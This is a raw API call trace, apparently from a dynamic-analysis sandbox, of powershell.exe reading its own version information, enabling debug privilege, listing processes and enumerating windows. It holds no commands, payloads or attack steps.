	[0675.670] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x2cf7394, puLen=0x1cdf00) returned 1
	[0675.671] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0675.671] CoTaskMemAlloc (cb=0x66) returned 0x23c680
	[0675.671] lstrcpyW (in: lpString1=0x23c680, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0675.671] CoTaskMemFree (pv=0x23c680) 
	[0675.671] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x0, puLen=0x1cdf00) returned 0
	[0675.671] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x0, puLen=0x1cdf00) returned 0
	[0675.671] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdf08, puLen=0x1cdf00 | out: lplpBuffer=0x1cdf08*=0x0, puLen=0x1cdf00) returned 0
	[0675.671] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cded8, puLen=0x1cded0 | out: lplpBuffer=0x1cded8*=0x2cf733c, puLen=0x1cded0) returned 1
	[0675.672] CoTaskMemAlloc (cb=0x204) returned 0x269950
	[0675.672] VerLanguageNameW (in: wLang=0x0, szLang=0x269950, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0675.674] CoTaskMemFree (pv=0x269950) 
	[0675.674] VerQueryValueW (in: pBlock=0x2cf72a0, lpSubBlock="\\", lplpBuffer=0x1cdf28, puLen=0x1cdf20 | out: lplpBuffer=0x1cdf28*=0x2cf72c8, puLen=0x1cdf20) returned 1
	[0675.680] GetCurrentProcessId () returned 0x17f4
	[0677.507] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1cce50 | out: lpLuid=0x1cce50*(LowPart=0x14, HighPart=0)) returned 1
	[0677.510] GetCurrentProcess () returned 0xffffffffffffffff
	[0677.510] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1cce70 | out: TokenHandle=0x1cce70*=0x2ec) returned 1
	[0677.512] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2cfab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0677.513] CloseHandle (hObject=0x2ec) returned 1
	[0677.517] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17f4) returned 0x2ec
	[0677.527] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2cfab80, cb=0x200, lpcbNeeded=0x1cde88 | out: lphModule=0x2cfab80, lpcbNeeded=0x1cde88) returned 1
	[0677.529] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2cfadf0, cb=0x18 | out: lpmodinfo=0x2cfadf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0679.462] CoTaskMemAlloc (cb=0x804) returned 0x2c8e50
	[0679.462] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x2c8e50, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0679.462] CoTaskMemFree (pv=0x2c8e50) 
	[0679.463] CoTaskMemAlloc (cb=0x804) returned 0x2c8e50
	[0679.463] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x2c8e50, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0679.463] CoTaskMemFree (pv=0x2c8e50) 
	[0679.464] CloseHandle (hObject=0x2ec) returned 1
	[0679.472] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x17f4) returned 0x2ec
	[0679.473] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x1cdfb8 | out: lpExitCode=0x1cdfb8*=0x103) returned 1
	[0679.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cfb088, Length=0x20000, ResultLength=0x1cdf80 | out: SystemInformation=0x12cfb088, ResultLength=0x1cdf80*=0x39f10) returned 0xc0000004
	[0679.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d1b0b8, Length=0x3c710, ResultLength=0x1cdf80 | out: SystemInformation=0x12d1b0b8, ResultLength=0x1cdf80*=0x3a3c8) returned 0x0
	[0684.318] EnumWindows (lpEnumFunc=0x2a766ac, lParam=0x0) returned 1
	[0684.320] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.320] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x558
	[0684.320] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.320] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.320] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.320] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x538
	[0684.320] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.320] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x778
	[0684.321] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x778
	[0684.321] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.321] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.321] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.321] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.321] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.321] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.321] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.322] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.322] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x460
	[0684.322] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.322] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x4d0
	[0684.322] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1190
	[0684.322] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x3a8
	[0684.322] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1bd0
	[0684.322] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1bfc
	[0684.323] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1a78
	[0684.323] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1b90
	[0684.323] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1b04
	[0684.323] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1b34
	[0684.323] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1b64
	[0684.323] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1bb0
	[0684.323] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1acc
	[0684.323] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1a2c
	[0684.324] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x19a8
	[0684.324] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1944
	[0684.324] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x18c8
	[0684.324] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x18ac
	[0684.324] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x18ec
	[0684.324] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1898
	[0684.324] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc98
	[0684.324] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x153c
	[0684.325] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1808
	[0684.325] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x12a4
	[0684.325] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1740
	[0684.325] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x16c4
	[0684.325] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1820
	[0684.325] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x16ac
	[0684.325] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1858
	[0684.325] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1664
	[0684.326] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10b4
	[0684.326] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10ac
	[0684.326] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10ec
	[0684.326] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1068
	[0684.326] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x17e0
	[0684.326] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x102c
	[0684.326] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x17a4
	[0684.326] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1050
	[0684.326] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1694
	[0684.327] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1770
	[0684.327] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1720
	[0684.327] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x165c
	[0684.327] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1578
	[0684.327] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x16c0
	[0684.327] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x161c
	[0684.327] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1638
	[0684.327] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x15c8
	[0684.328] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1554
	[0684.328] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1674
	[0684.328] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1520
	[0684.328] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x14bc
	[0684.328] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf8c
	[0684.328] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe9c
	[0684.328] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1434
	[0684.328] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x14ec
	[0684.329] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xfcc
	[0684.329] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x12ac
	[0684.329] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1484
	[0684.329] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x934
	[0684.329] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc0c
	[0684.329] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb08
	[0684.329] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x948
	[0684.329] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1178
	[0684.330] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x13e0
	[0684.330] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xcd0
	[0684.330] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x13fc
	[0684.330] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xdc8
	[0684.330] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc18
	[0684.330] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc2c
	[0684.330] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa1c
	[0684.330] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1244
	[0684.331] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xdb0
	[0684.331] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1398
	[0684.331] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1358
	[0684.331] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1370
	[0684.331] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1340
	[0684.331] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x130c
	[0684.331] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x12c0
	[0684.331] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x12e4
	[0684.331] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1270
	[0684.332] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1298
	[0684.332] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x120c
	[0684.332] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x122c
	[0684.332] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x11c4
	[0684.332] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x11b0
	[0684.332] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1188
	[0684.332] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1148
	[0684.332] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x1160
	[0684.333] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x10fc
	[0684.333] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe34
	[0684.333] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xea4
	[0684.333] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x514
	[0684.333] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe48
	[0684.333] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xbc8
	[0684.333] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xdf8
	[0684.333] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x318
	[0684.334] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xcac
	[0684.334] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x8bc
	[0684.334] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf9c
	[0684.334] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf48
	[0684.334] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe40
	[0684.334] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xecc
	[0684.334] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xeb8
	[0684.334] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe80
	[0684.334] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe98
	[0684.335] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe60
	[0684.335] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xee4
	[0684.335] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xf00
	[0684.335] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xdf0
	[0684.335] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xe1c
	[0684.335] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xdd0
	[0684.335] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xd94
	[0684.335] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xd74
	[0684.336] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xd00
	[0684.336] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xcd8
	[0684.336] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc84
	[0684.336] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xca4
	[0684.336] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc64
	[0684.336] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xc24
	[0684.336] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb84
	[0684.336] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xbac
	[0684.337] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x384
	[0684.337] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xab8
	[0684.337] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x33c
	[0684.337] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa44
	[0684.337] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa64
	[0684.337] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x8a8
	[0684.337] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xaf0
	[0684.337] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x88c
	[0684.337] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xb04
	[0684.338] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x910
	[0684.338] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x230
	[0684.338] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xac0
	[0684.338] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xab4
	[0684.338] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xaac
	[0684.338] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x3d0
	[0684.338] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x978
	[0684.338] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0xa7c
	[0684.339] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1cdce0 | out: lpdwProcessId=0x1cdce0) returned 0x59c
